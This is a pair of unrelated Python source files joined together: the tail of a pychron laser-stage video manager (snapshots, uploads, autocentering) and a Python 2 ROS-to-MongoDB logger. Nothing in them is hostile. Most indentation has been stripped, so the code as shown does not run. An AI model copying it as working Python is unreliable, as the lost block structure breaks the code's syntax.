'Snapshot saved: "{}".\nUploaded : "{}"'.format(
path, upath
)
)
else:
self.information_dialog(
'Snapshot uploaded to "{}"'.format(upath)
)
else:
upath = None
if inform:
self.information_dialog('Snapshot saved to "{}"'.format(path))
if return_blob:
with open(path, "rb") as rfile:
im = rfile.read()
return path, upath, im
else:
return path, upath
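    # Usage sketch for snapshot() (argument values are illustrative only):
    #
    #     path, upath = manager.snapshot(name='grain_42', inform=False)
    #     path, upath, blob = manager.snapshot(auto=True, return_blob=True)
    #
    # 'upath' is the remote media-storage path when auto_upload is enabled,
    # otherwise None.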
def kill(self):
""" """
super(VideoStageManager, self).kill()
if self.camera:
self.camera.save_calibration()
self.stop_timer = True
self.canvas.close_video()
if self.video:
self.video.close(force=True)
# if self.use_video_server:
# self.video_server.stop()
# if self._stage_maps:
# for s in self._stage_maps:
# s.dump_correction_file()
self.clean_video_archive()
def clean_video_archive(self):
if self.use_video_archiver:
self.info("Cleaning video directory")
self.video_archiver.clean(("manifest.yaml",))
def is_auto_correcting(self):
return self._auto_correcting
def cancel_auto_correcting(self):
self.autocenter_manager.cancel()
return True
crop_width = 5
crop_height = 5
def get_scores(self, **kw):
ld = self.lumen_detector
src = self._get_preprocessed_src()
return ld.get_scores(src, **kw)
def find_lum_peak(self, min_distance, blur, **kw):
ld = self.lumen_detector
src = self._get_preprocessed_src()
dim = self.get_target_dimension()
mask_dim = dim * 1.05
# mask_dim_mm = mask_dim * self.pxpermm
if src is not None and src.ndim >= 2:
return ld.find_lum_peak(
src, dim, mask_dim, blur=blur, min_distance=min_distance, **kw
)
def get_brightness(self, **kw):
ld = self.lumen_detector
src = self._get_preprocessed_src()
dim = self.get_target_dimension()
return ld.get_value(src, dim, **kw)
# src = self.video.get_cached_frame()
# csrc = copy(src)
# src, v = ld.get_value(csrc, **kw)
# return csrc, src, v
def get_frame_size(self):
cw = 2 * self.crop_width * self.pxpermm
ch = 2 * self.crop_height * self.pxpermm
return cw, ch
def close_open_images(self):
if self.autocenter_manager:
self.autocenter_manager.close_open_images()
def finish_move_to_hole(self, user_entry):
self.debug("finish move to hole")
# if user_entry and not self.keep_images_open:
# self.close_open_images()
def get_preprocessed_src(self):
return self._get_preprocessed_src()
def get_target_dimension(self, hole=None):
dim = self.stage_map.g_dimension
if hole:
if isinstance(hole, (int, str)):
hole = self.stage_map.get_hole(hole)
dim = hole.dimension
return dim * self.dimension_multiplier
def get_mask_dimension(self):
return self.get_target_dimension() * 1.05
# private
def _get_preprocessed_src(self):
ld = self.lumen_detector
src = copy(self.video.get_cached_frame())
dim = self.get_target_dimension()
ld.pxpermm = self.pxpermm
offx, offy = self.canvas.get_screen_offset()
cropdim = dim * 2.5
if src is not None:
if len(src.shape):
src = ld.crop(src, cropdim, cropdim, offx, offy, verbose=False)
return src
def _stage_map_changed_hook(self):
self.lumen_detector.hole_radius = self.get_target_dimension()
def _upload(self, src, inform=True):
if not self.use_media_storage:
msg = "Use Media Storage not enabled in Laser preferences"
if inform:
self.warning_dialog(msg)
else:
self.warning(msg)
else:
srv = "pychron.media_storage.manager.MediaStorageManager"
msm = self.parent.application.get_service(srv)
if msm is not None:
d = os.path.split(os.path.dirname(src))[-1]
dest = os.path.join(self.parent.name, d, os.path.basename(src))
msm.put(src, dest)
if not self.keep_local_copy:
self.debug("removing {}".format(src))
if src.endswith(".avi"):
head, ext = os.path.splitext(src)
vd = "{}-images".format(head)
self.debug("removing video build directory {}".format(vd))
shutil.rmtree(vd)
os.remove(src)
dest = "{}/{}".format(msm.get_base_url(), dest)
return dest
else:
msg = "Media Storage Plugin not enabled"
if inform:
self.warning_dialog(msg)
else:
self.warning(msg)
def _render_snapshot(self, path):
from chaco.plot_graphics_context import PlotGraphicsContext
c = self.canvas
p = None
was_visible = False
if not self.render_with_markup:
p = c.show_laser_position
c.show_laser_position = False
if self.points_programmer.is_visible:
c.hide_all()
was_visible = True
gc = PlotGraphicsContext((int(c.outer_width), int(c.outer_height)))
c.do_layout()
gc.render_component(c)
# gc.save(path)
from pychron.core.helpers import save_gc
save_gc.save(gc, path)
if p is not None:
c.show_laser_position = p
if was_visible:
c.show_all()
def _start_recording(self, path, basename):
self.info("start video recording {}".format(path))
d = os.path.dirname(path)
if not os.path.isdir(d):
self.warning("invalid directory {}".format(d))
self.warning("using default directory")
path, _ = unique_path(paths.video_dir, basename, extension="avi")
self.info("saving recording to path {}".format(path))
# if self.use_db:
# db = self.get_video_database()
# db.connect()
#
# v = db.add_video_record(rid=basename)
# db.add_path(v, path)
# self.info('saving {} to database'.format(basename))
# db.commit()
video = self.video
crop_to_hole = True
dim = self.get_target_dimension()
cropdim = dim * 8 * self.pxpermm
color = self.canvas.crosshairs_color.getRgb()[:3]
r = int(self.canvas.get_crosshairs_radius() * self.pxpermm)
# offx, offy = self.canvas.get_screen_offset()
def renderer(p):
# cw, ch = self.get_frame_size()
frame = video.get_cached_frame()
if frame is not None:
if not len(frame.shape):
return
frame = copy(frame)
# ch, cw, _ = frame.shape
# ch, cw = int(ch), int(cw)
if crop_to_hole:
frame = video.crop(frame, 0, 0, cropdim, cropdim)
if self.render_with_markup:
# draw crosshairs
if len(frame.shape) == 2:
frame = gray2rgb(frame)
ch, cw, _ = frame.shape
ch, cw = int(ch), int(cw)
y = ch // 2
x = cw // 2
cp = circle_perimeter(y, x, r, shape=(ch, cw))
frame[cp] = color
frame[line(y, 0, y, x - r)] = color # left
frame[line(y, x + r, y, int(cw) - 1)] = color # right
frame[line(0, x, y - r, x)] = color # bottom
frame[line(y + r, x, int(ch) - 1, x)] = color # top
if frame is not None:
pil_save(frame, p)
self.video.start_recording(path, renderer)
def _move_to_hole_hook(self, holenum, correct, autocentered_position):
args = holenum, correct, autocentered_position
self.debug(
"move to hole hook holenum={}, "
"correct={}, autocentered_position={}".format(*args)
)
if correct:
ntries = 1 if autocentered_position else 3
self._auto_correcting = True
try:
self._autocenter(holenum=holenum, ntries=ntries, save=True)
except BaseException as e:
self.critical("Autocentering failed. {}".format(e))
self._auto_correcting = False
# def find_center(self):
# ox, oy = self.canvas.get_screen_offset()
# rpos, src = self.autocenter_manager.calculate_new_center(
# self.stage_controller.x,
# self.stage_controller.y,
# ox, oy,
# dim=self.stage_map.g_dimension, open_image=False)
#
# return rpos, src
# def find_target(self):
# if self.video:
# ox, oy = self.canvas.get_screen_offset()
# src = self.video.get_cached_frame()
#
# ch = cw = self.pxpermm * self.stage_map.g_dimension * 2.5
# src = self.video.crop(src, ox, oy, cw, ch)
# return self.lumen_detector.find_target(src)
#
# def find_best_target(self):
# if self.video:
# src = self.video.get_cached_frame()
# src = self.autocenter_manager.crop(src)
# return self.lumen_detector.find_best_target(src)
def _autocenter(self, holenum=None, ntries=3, save=False, inform=False):
self.debug("do autocenter")
rpos = None
interp = False
sm = self.stage_map
st = time.time()
if self.autocenter_manager.use_autocenter:
time.sleep(0.1)
dim = self.get_target_dimension()
shape = sm.g_shape
if holenum is not None:
hole = sm.get_hole(holenum)
if hole is not None:
dim = self.get_target_dimension(holenum)
shape = hole.shape
ox, oy = self.canvas.get_screen_offset()
for ti in range(max(1, ntries)):
# use machine vision to calculate positioning error
rpos = self.autocenter_manager.calculate_new_center(
self.stage_controller.x,
self.stage_controller.y,
ox,
oy,
dim=dim,
shape=shape,
)
if rpos is not None:
self.linear_move(
*rpos,
block=True,
source="autocenter",
use_calibration=False,
update_hole=False,
velocity_scalar=0.1
)
time.sleep(0.1)
else:
self.snapshot(
auto=True,
name="pos_err_{}_{}".format(holenum, ti),
inform=inform,
)
break
# if use_interpolation and rpos is None:
# self.info('trying to get interpolated position')
# rpos = sm.get_interpolated_position(holenum)
# if rpos:
# s = '{:0.3f},{:0.3f}'
# interp = True
# else:
# s = 'None'
# self.info('interpolated position= {}'.format(s))
if rpos:
corrected = True
# add an adjustment value to the stage map
if save and holenum is not None:
sm.set_hole_correction(holenum, *rpos)
sm.dump_correction_file()
# f = 'interpolation' if interp else 'correction'
else:
# f = 'uncorrected'
corrected = False
if holenum is not None:
hole = sm.get_hole(holenum)
if hole:
rpos = hole.nominal_position
self.debug("Autocenter duration ={}".format(time.time() - st))
return rpos, corrected, interp
# ===============================================================================
# views
# ===============================================================================
# ===============================================================================
# view groups
# ===============================================================================
# ===============================================================================
# handlers
# ===============================================================================
def _configure_camera_device_button_fired(self):
if self.video:
self.video.load_configuration(self.video_configuration_path)
if hasattr(self.video.cap, "reload_configuration"):
self.video.cap.reload_configuration(self.video_configuration_path)
self.lumen_detector.pixel_depth = self.video.pixel_depth
def _update_zoom(self, v):
if self.camera:
self._update_xy_limits()
@on_trait_change("parent:motor_event")
def _update_motor(self, new):
print("motor event", new, self.canvas, self.canvas.camera)
# s = self.stage_controller
if self.camera:
if not isinstance(new, (int, float)):
args, _ = new
name, v = args[:2]
else:
name = "zoom"
v = new
if name == "zoom":
self._update_xy_limits()
# pxpermm = self.canvas.camera.set_limits_by_zoom(v, s.x, s.y)
# self.pxpermm = pxpermm
elif name == "beam":
self.lumen_detector.beam_radius = v / 2.0
def _pxpermm_changed(self, new):
if self.autocenter_manager:
self.autocenter_manager.pxpermm = new
self.lumen_detector.pxpermm = new
# self.lumen_detector.mask_radius = new*self.stage_map.g_dimension
def _autocenter_button_fired(self):
self.goto_position(self.calibrated_position_entry, autocenter_only=True)
# def _configure_autocenter_button_fired(self):
# info = self.autocenter_manager.edit_traits(view='configure_view',
# kind='livemodal')
# if info.result:
# self.autocenter_manager.dump_detector()
def _snapshot_button_fired(self):
n = 1
if self.snapshot_mode == "3 Burst":
n = 3
elif self.snapshot_mode == "10 Burst":
n = 10
bd = self.burst_delay * 0.001
delay = n > 1
for i in range(n):
st = time.time()
self.snapshot(inform=False)
if delay:
time.sleep(max(0, bd - time.time() + st))
def _record_fired(self):
# time.sleep(4)
# self.stop_recording()
if self.is_recording:
self.stop_recording()
else:
self.start_recording()
def _use_video_server_changed(self):
if self.use_video_server:
self.video_server.start()
else:
self.video_server.stop()
def _get_camera_zoom_coefficients(self):
return self.camera.zoom_coefficients
def _set_camera_zoom_coefficients(self, v):
self.camera.zoom_coefficients = ",".join(map(str, v))
self._update_xy_limits()
def _validate_camera_zoom_coefficients(self, v):
try:
return list(map(float, v.split(",")))
except ValueError:
pass
def _update_xy_limits(self):
z = 0
if self.parent is not None:
zoom = self.parent.get_motor("zoom")
if zoom is not None:
z = zoom.data_position
x = self.stage_controller.get_current_position("x")
y = self.stage_controller.get_current_position("y")
if self.camera:
pxpermm = self.camera.set_limits_by_zoom(z, x, y, self.canvas)
self.pxpermm = pxpermm
self.debug("updated xy limits zoom={}, pxpermm={}".format(z, pxpermm))
self.canvas.request_redraw()
def _get_record_label(self):
return "Start Recording" if not self.is_recording else "Stop"
# ===============================================================================
# factories
# ===============================================================================
def _canvas_factory(self):
""" """
v = VideoLaserTrayCanvas(stage_manager=self, padding=30)
return v
def _canvas_editor_factory(self):
e = super(VideoStageManager, self)._canvas_editor_factory()
e.stop_timer = "stop_timer"
return e
# ===============================================================================
# defaults
# ===============================================================================
def _camera_default(self):
klass = YamlCamera
# p = os.path.join(self.configuration_dir_path, 'camera.yaml')
p = self.video_configuration_path
if p is not None:
if not os.path.isfile(p):
klass = Camera
pp = os.path.join(self.configuration_dir_path, "camera.cfg")
if not os.path.isfile(pp):
self.warning_dialog(
"No Camera configuration file a {} or {}".format(p, pp)
)
p = pp
camera = klass()
camera.load(p)
else:
camera = Camera()
camera.set_limits_by_zoom(0, 0, 0, self.canvas)
self._camera_zoom_coefficients = camera.zoom_coefficients
return camera
def _lumen_detector_default(self):
ld = LumenDetector()
ld.pixel_depth = self.video.pixel_depth
return ld
def _video_default(self):
v = Video()
self.canvas.video = v
return v
def _video_server_default(self):
from pychron.image.video_server import VideoServer
return VideoServer(video=self.video)
def _video_archiver_default(self):
from pychron.core.helpers.archiver import Archiver
return Archiver()
def _autocenter_manager_default(self):
if self.parent.mode != "client":
# from pychron.mv.autocenter_manager import AutoCenterManager
if "co2" in self.parent.name.lower():
from pychron.mv.autocenter_manager import CO2AutocenterManager
klass = CO2AutocenterManager
else:
from pychron.mv.autocenter_manager import DiodeAutocenterManager
klass = DiodeAutocenterManager
return klass(
video=self.video, canvas=self.canvas, application=self.application
)
def _autofocus_manager_default(self):
if self.parent.mode != "client":
from pychron.mv.focus.autofocus_manager import AutoFocusManager
return AutoFocusManager(
video=self.video,
laser_manager=self.parent,
stage_controller=self.stage_controller,
canvas=self.canvas,
application=self.application,
)
# def _zoom_calibration_manager_default(self):
# if self.parent.mode != 'client':
# from pychron.mv.zoom.zoom_calibration import ZoomCalibrationManager
# return ZoomCalibrationManager(laser_manager=self.parent)
# ===============================================================================
# calculate camera params
# ===============================================================================
# def _calculate_indicator_positions(self, shift=None):
# ccm = self.camera_calibration_manager
#
# zoom = self.parent.zoom
# pychron, name = self.video_manager.snapshot(identifier=zoom)
# ccm.image_factory(pychron=pychron)
#
# ccm.process_image()
# ccm.title = name
#
# cond = Condition()
# ccm.cond = cond
# cond.acquire()
# do_later(ccm.edit_traits, view='snapshot_view')
# if shift:
# self.stage_controller.linear_move(*shift, block=False)
#
# cond.wait()
# cond.release()
#
# def _calculate_camera_parameters(self):
# ccm = self.camera_calibration_manager
# self._calculate_indicator_positions()
# if ccm.result:
# if self.calculate_offsets:
# rdxmm = 5
# rdymm = 5
#
# x = self.stage_controller.x + rdxmm
# y = self.stage_controller.y + rdymm
# self.stage_controller.linear_move(x, y, block=True)
#
# time.sleep(2)
#
# polygons1 = ccm.polygons
# x = self.stage_controller.x - rdxmm
# y = self.stage_controller.y - rdymm
# self._calculate_indicator_positions(shift=(x, y))
#
# polygons2 = ccm.polygons
#
# # compare polygon sets
# # calculate pixel displacement
# dxpx = sum([sum([(pts1.x - pts2.x)
# for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
# for p1, p2 in zip(polygons1, polygons2)]) / len(polygons1)
# dypx = sum([sum([(pts1.y - pts2.y)
# for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
# for p1, p2 in zip(polygons1, polygons2)]) / len(polygons1)
#
# # convert pixel displacement to mm using defined mapping
# dxmm = dxpx / self.pxpercmx
# dymm = dypx / self.pxpercmy
#
# # calculate drive offset. ratio of request/actual
# try:
# self.drive_xratio = rdxmm / dxmm
# self.drive_yratio = rdymm / dymm
# except ZeroDivisionError:
# self.drive_xratio = 100
#
# def _calibration_manager_default(self):
#
# # self.video.open(user = 'calibration')
# return CalibrationManager(parent = self,
# laser_manager = self.parent,
# video_manager = self.video_manager,
# )
# ============= EOF ====================================
# adxs = []
# adys = []
# for p1, p2 in zip(polygons, polygons2):
# # dxs = []
# # dys = []
# # for pts1, pts2 in zip(p1.points, p2.points):
# #
# # dx = pts1.x - pts2.x
# # dy = pts1.y - pts2.y
# # dxs.append(dx)
# # dys.append(dy)
# # dxs = [(pts1.x - pts2.x) for pts1, pts2 in zip(p1.points, p2.points)]
# # dys = [(pts1.y - pts2.y) for pts1, pts2 in zip(p1.points, p2.points)]
# #
# adx = sum([(pts1.x - pts2.x) for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
# ady = sum([(pts1.y - pts2.y) for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
#
# # adx = sum(dxs) / len(dxs)
# # ady = sum(dys) / len(dys)
# adxs.append(adx)
# adys.append(ady)
# print 'xoffset', sum(adxs) / len(adxs)
# print 'yoffset', sum(adys) / len(adys)
|
mongodb_log.py
|
#!/usr/bin/python
###########################################################################
# mongodb_log.py - Python based ROS to MongoDB logger (multi-process)
#
# Created: Sun Dec 05 19:45:51 2010
# Copyright 2010-2012 Tim Niemueller [www.niemueller.de]
# 2010-2011 Carnegie Mellon University
# 2010 Intel Labs Pittsburgh
###########################################################################
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# Read the full text in the LICENSE.GPL file in the doc directory.
# make sure we aren't using floor division
from __future__ import division, with_statement
PACKAGE_NAME='mongodb_log'
NODE_NAME='mongodb_log'
NODE_NAME_TEMPLATE='%smongodb_log'
WORKER_NODE_NAME = "%smongodb_log_worker_%d_%s"
QUEUE_MAXSIZE = 100
# import roslib; roslib.load_manifest(PACKAGE_NAME)
import rospy
# for msg_to_document
import mongodb_store.util
import os
import re
import sys
import time
import pprint
import string
import signal
import subprocess
import socket
from threading import Thread, Timer
from Queue import Empty
from optparse import OptionParser
from tempfile import mktemp
from datetime import datetime, timedelta
from time import sleep
from random import randint
from tf.msg import tfMessage
from sensor_msgs.msg import PointCloud, CompressedImage
from roslib.packages import find_node
#from rviz_intel.msg import TriangleMesh
use_setproctitle = True
try:
from setproctitle import setproctitle
except ImportError:
use_setproctitle = False
use_processes = False
# if use_processes:
from multiprocessing import Process, Lock, Condition, Queue, Value, current_process, Event
import multiprocessing as mp
# else:
# from threading import Lock, Condition, Event
# from Queue import Queue
# def Value(t, val, lock=None):
# return val
import genpy
import rosgraph.masterapi
import roslib.message
#from rospy import Time, Duration
import rostopic
from pymongo import SLOW_ONLY
from pymongo.errors import InvalidDocument, InvalidStringData
MongoClient = mongodb_store.util.import_MongoClient()
BACKLOG_WARN_LIMIT = 100
STATS_LOOPTIME = 10
STATS_GRAPHTIME = 60
class Counter(object):
def __init__(self, value = None, lock = True):
self.count = value or Value('i', 0, lock=lock)
self.mutex = Lock()
def increment(self, by = 1):
with self.mutex: self.count.value += by
def value(self):
with self.mutex: return self.count.value
class Barrier(object):
def __init__(self, num_threads):
self.num_threads = num_threads
self.threads_left = Value('i', num_threads, lock=True)
self.mutex = Lock()
self.waitcond = Condition(self.mutex)
def wait(self):
self.mutex.acquire()
self.threads_left.value -= 1
if self.threads_left.value == 0:
self.threads_left.value = self.num_threads
self.waitcond.notify_all()
self.mutex.release()
else:
self.waitcond.wait()
self.mutex.release()
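# Hedged usage sketch (not part of the original logger): each participating
# process calls wait() on the shared Barrier and is released only once
# num_procs processes have arrived. The worker function below is illustrative.
def _example_barrier_usage(num_procs=3):
    barrier = Barrier(num_procs)
    def _arrive(b):
        b.wait()
    procs = [Process(target=_arrive, args=(barrier,)) for _ in range(num_procs)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()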
class WorkerProcess(object):
def __init__(self, idnum, topic, collname, in_counter_value, out_counter_value,
drop_counter_value, queue_maxsize,
mongodb_host, mongodb_port, mongodb_name, nodename_prefix):
self.name = "WorkerProcess-%4d-%s" % (idnum, topic)
self.id = idnum
self.topic = topic
self.collname = collname
self.queue = Queue(queue_maxsize)
self.out_counter = Counter(out_counter_value)
self.in_counter = Counter(in_counter_value)
self.drop_counter = Counter(drop_counter_value)
self.worker_out_counter = Counter()
self.worker_in_counter = Counter()
self.worker_drop_counter = Counter()
self.mongodb_host = mongodb_host
self.mongodb_port = mongodb_port
self.mongodb_name = mongodb_name
self.nodename_prefix = nodename_prefix
self.quit = Value('i', 0)
# print "Creating process %s" % self.name
self.process = Process(name=self.name, target=self.run)
# self.process = Thread(name=self.name, target=self.run)
# print "created %s" % self.process
self.process.start()
# print "started %s" % self.process
def init(self):
global use_setproctitle
if use_setproctitle:
setproctitle("mongodb_log %s" % self.topic)
self.mongoconn = MongoClient(self.mongodb_host, self.mongodb_port)
self.mongodb = self.mongoconn[self.mongodb_name]
self.mongodb.set_profiling_level(SLOW_ONLY)
self.collection = self.mongodb[self.collname]
self.collection.count()
self.queue.cancel_join_thread()
# clear signal handlers in this child process, rospy will handle signals for us
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
worker_node_name = WORKER_NODE_NAME % (self.nodename_prefix, self.id, self.collname)
# print "Calling init_node with %s from process %s" % (worker_node_name, mp.current_process())
rospy.init_node(worker_node_name, anonymous=False)
self.subscriber = None
while not self.subscriber and not self.is_quit():
try:
msg_class, real_topic, msg_eval = rostopic.get_topic_class(self.topic, blocking=True)
self.subscriber = rospy.Subscriber(real_topic, msg_class, self.enqueue, self.topic)
except rostopic.ROSTopicIOException:
print("FAILED to subscribe, will keep trying %s" % self.name)
time.sleep(randint(1,10))
except rospy.ROSInitException:
print("FAILED to initialize, will keep trying %s" % self.name)
time.sleep(randint(1,10))
self.subscriber = None
def run(self):
self.init()
print("ACTIVE: %s" % self.name)
# run the thread
self.dequeue()
# free connection
# self.mongoconn.end_request()
def is_quit(self):
return self.quit.value == 1
def shutdown(self):
if not self.is_quit():
#print("SHUTDOWN %s qsize %d" % (self.name, self.queue.qsize()))
self.quit.value = 1
self.queue.put("shutdown")
while not self.queue.empty(): sleep(0.1)
#print("JOIN %s qsize %d" % (self.name, self.queue.qsize()))
self.process.join()
self.process.terminate()
def qsize(self):
return self.queue.qsize()
def enqueue(self, data, topic, current_time=None):
if not self.is_quit():
if self.queue.full():
try:
self.queue.get_nowait()
self.drop_counter.increment()
self.worker_drop_counter.increment()
except Empty:
pass
#self.queue.put((topic, data, current_time or datetime.now()))
self.queue.put((topic, data, rospy.get_time(), data._connection_header))
self.in_counter.increment()
self.worker_in_counter.increment()
def dequeue(self):
while not self.is_quit():
t = None
try:
t = self.queue.get(True)
except IOError:
# Anticipate Ctrl-C
#print("Quit W1: %s" % self.name)
self.quit.value = 1
break
if isinstance(t, tuple):
self.out_counter.increment()
self.worker_out_counter.increment()
topic = t[0]
msg = t[1]
ctime = t[2]
connection_header = t[3]
if isinstance(msg, rospy.Message):
try:
#print(self.sep + threading.current_thread().getName() + "@" + topic+": ")
#pprint.pprint(doc)
meta = {}
# switched to use inserted_at to match message_store
# meta["recorded"] = ctime or datetime.now()
meta["topic"] = topic
if connection_header['latching'] == '1':
meta['latch'] = True
else:
meta['latch'] = False
if ctime is not None:
meta['inserted_at'] = datetime.utcfromtimestamp(ctime)
else:
meta['inserted_at'] = datetime.utcfromtimestamp(rospy.get_rostime().to_sec())
mongodb_store.util.store_message(self.collection, msg, meta)
except InvalidDocument, e:
print("InvalidDocument " + current_process().name + "@" + topic +": \n")
print e
except InvalidStringData, e:
print("InvalidStringData " + current_process().name + "@" + topic +": \n")
print e
else:
#print("Quit W2: %s" % self.name)
self.quit.value = 1
# we must make sure to clear the queue before exiting,
# or the parent thread might deadlock otherwise
#print("Quit W3: %s" % self.name)
self.subscriber.unregister()
self.subscriber = None
while not self.queue.empty():
t = self.queue.get_nowait()
print("STOPPED: %s" % self.name)
class SubprocessWorker(object):
def __init__(self, idnum, topic, collname, in_counter_value, out_counter_value,
drop_counter_value, queue_maxsize,
mongodb_host, mongodb_port, mongodb_name, nodename_prefix, cpp_logger):
self.name = "SubprocessWorker-%4d-%s" % (idnum, topic)
self.id = idnum
self.topic = topic
self.collname = collname
self.queue = Queue(queue_maxsize)
self.out_counter = Counter(out_counter_value)
self.in_counter = Counter(in_counter_value)
self.drop_counter = Counter(drop_counter_value)
self.worker_out_counter = Counter()
self.worker_in_counter = Counter()
self.worker_drop_counter = Counter()
self.mongodb_host = mongodb_host
self.mongodb_port = mongodb_port
self.mongodb_name = mongodb_name
self.nodename_prefix = nodename_prefix
self.quit = False
self._qsize = 0
self.thread = Thread(name=self.name, target=self.run)
mongodb_host_port = "%s:%d" % (mongodb_host, mongodb_port)
collection = "%s.%s" % (mongodb_name, collname)
nodename = WORKER_NODE_NAME % (self.nodename_prefix, self.id, self.collname)
self.process = subprocess.Popen([cpp_logger[0], "-t", topic, "-n", nodename,
"-m", mongodb_host_port, "-c", collection],
stdout=subprocess.PIPE)
self.thread.start()
def qsize(self):
return self._qsize
def run(self):
while not self.quit:
line = self.process.stdout.readline().rstrip()
if line == "": continue
arr = string.split(line, ":")
self.in_counter.increment(int(arr[0]))
self.out_counter.increment(int(arr[1]))
self.drop_counter.increment(int(arr[2]))
self._qsize = int(arr[3])
self.worker_in_counter.increment(int(arr[0]))
self.worker_out_counter.increment(int(arr[1]))
self.worker_drop_counter.increment(int(arr[2]))
def shutdown(self):
self.quit = True
self.process.kill()
self.process.wait()
class MongoWriter(object):
def __init__(self, topics = [], treat_as_regex=False,
all_topics = False, all_topics_interval = 5,
exclude_topics = [],
mongodb_host=None, mongodb_port=None, mongodb_name="roslog", mongodb_collection=None,
no_specific=False, nodename_prefix=""):
self.all_topics = all_topics
self.all_topics_interval = all_topics_interval
self.exclude_topics = exclude_topics
self.mongodb_host = mongodb_host
self.mongodb_port = mongodb_port
self.mongodb_name = mongodb_name
self.mongodb_collection = mongodb_collection
self.no_specific = no_specific
self.nodename_prefix = nodename_prefix
self.quit = False
self.topics = set()
self.collnames = set()
#self.str_fn = roslib.message.strify_message
self.sep = "\n" #'\033[2J\033[;H'
self.in_counter = Counter()
self.out_counter = Counter()
self.drop_counter = Counter()
self.workers = []
global use_setproctitle
if use_setproctitle:
setproctitle("mongodb_log MAIN")
self.exclude_regex = []
for et in self.exclude_topics:
self.exclude_regex.append(re.compile(et))
self.exclude_already = []
if treat_as_regex:
topics = self.expand_regex_to_topics(topics)
self.missing_topics = self.subscribe_topics(set(topics))
self.fill_in_topics()
if self.all_topics:
print("All topics")
self.ros_master = rosgraph.masterapi.Master(NODE_NAME_TEMPLATE % self.nodename_prefix)
self.update_topics(restart=False)
self.start_all_topics_timer()
def expand_regex_to_topics(self, topics):
expanded_topics = []
published_topics = [t[0] for t in rospy.get_published_topics()]
for pattern in topics:
exp = re.compile(pattern)
expanded_topics += filter(lambda t: exp.match(t) is not None, published_topics)
return expanded_topics
def subscribe_topics(self, topics):
# print "existing topics %s" % self.topics
# print "subscribing to topics %s" % topics
missing_topics = set()
for topic in topics:
if topic and topic[-1] == '/':
topic = topic[:-1]
if topic in self.topics: continue
if topic in self.exclude_already: continue
do_continue = False
for tre in self.exclude_regex:
if tre.match(topic):
print("*** IGNORING topic %s due to exclusion rule" % topic)
do_continue = True
self.exclude_already.append(topic)
break
if do_continue: continue
# although the collections is not strictly necessary, since MongoDB could handle
# pure topic names as collection names and we could then use mongodb[topic], we want
# to have names that go easier with the query tools, even though there is the theoretical
# possibility of name clashes (hence the check)
if self.mongodb_collection:
collname = self.mongodb_collection
else:
collname = mongodb_store.util.topic_name_to_collection_name(topic)
if collname in self.collnames:
print("Two converted topic names clash: %s, ignoring topic %s"
% (collname, topic))
continue
try:
print("Adding topic %s" % topic)
w = self.create_worker(len(self.workers), topic, collname)
self.workers.append(w)
self.collnames |= set([collname])
self.topics |= set([topic])
except Exception, e:
print('Failed to subscribe to %s due to %s' % (topic, e))
missing_topics.add(topic)
return missing_topics
def create_worker(self, idnum, topic, collname):
try:
msg_class, real_topic, msg_eval = rostopic.get_topic_class(topic, blocking=False)
except Exception, e:
print('Topic %s not announced, cannot get type: %s' % (topic, e))
raise
if real_topic is None:
raise rostopic.ROSTopicException('topic type was empty, probably not announced')
w = None
node_path = None
if not self.no_specific and msg_class == tfMessage:
print("DETECTED transform topic %s, using fast C++ logger" % topic)
node_path = find_node(PACKAGE_NAME, "mongodb_log_tf")
if not node_path:
print("FAILED to detect mongodb_log_tf, falling back to generic logger (did not build package?)")
elif not self.no_specific and msg_class == PointCloud:
print("DETECTED point cloud topic %s, using fast C++ logger" % topic)
node_path = find_node(PACKAGE_NAME, "mongodb_log_pcl")
if not node_path:
print("FAILED to detect mongodb_log_pcl, falling back to generic logger (did not build package?)")
elif not self.no_specific and msg_class == CompressedImage:
print("DETECTED compressed image topic %s, using fast C++ logger" % topic)
node_path = find_node(PACKAGE_NAME, "mongodb_log_cimg")
if not node_path:
print("FAILED to detect mongodb_log_cimg, falling back to generic logger (did not build package?)")
"""
elif msg_class == TriangleMesh:
print("DETECTED triangle mesh topic %s, using fast C++ logger" % topic)
node_path = find_node(PACKAGE_NAME, "mongodb_log_trimesh")
if not node_path:
print("FAILED to detect mongodb_log_trimesh, falling back to generic logger (did not build package?)")
"""
if node_path:
w = SubprocessWorker(idnum, topic, collname,
self.in_counter.count, self.out_counter.count,
self.drop_counter.count, QUEUE_MAXSIZE,
self.mongodb_host, self.mongodb_port, self.mongodb_name,
self.nodename_prefix, node_path)
if not w:
print("GENERIC Python logger used for topic %s" % topic)
w = WorkerProcess(idnum, topic, collname,
self.in_counter.count, self.out_counter.count,
self.drop_counter.count, QUEUE_MAXSIZE,
self.mongodb_host, self.mongodb_port, self.mongodb_name,
self.nodename_prefix)
return w
def run(self):
looping_threshold = timedelta(0, STATS_LOOPTIME, 0)
while not self.quit:
started = datetime.now()
# the following code makes sure we run once per STATS_LOOPTIME, taking
# varying run-times and interrupted sleeps into account
td = datetime.now() - started
while not self.quit and td < looping_threshold:
sleeptime = STATS_LOOPTIME - (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10**6
if sleeptime > 0: sleep(sleeptime)
td = datetime.now() - started
def shutdown(self):
self.quit = True
if hasattr(self, "all_topics_timer"): self.all_topics_timer.cancel()
for w in self.workers:
#print("Shutdown %s" % name)
w.shutdown()
def start_all_topics_timer(self):
if not self.all_topics or self.quit: return
self.all_topics_timer = Timer(self.all_topics_interval, self.update_topics)
self.all_topics_timer.start()
def start_fill_in_topics_timer(self):
if len(self.missing_topics) == 0 or self.quit: return
self.fill_in_topics_timer = Timer(self.all_topics_interval, self.fill_in_topics)
self.fill_in_topics_timer.start()
def update_topics(self, restart=True):
"""
Called at a fixed interval (see start_all_topics_timer) to update the list of topics if we are logging all topics (e.g. --all-topics flag is given).
"""
if not self.all_topics or self.quit: return
ts = rospy.get_published_topics()
topics = set([t for t, t_type in ts if t != "/rosout" and t != "/rosout_agg"])
new_topics = topics - self.topics
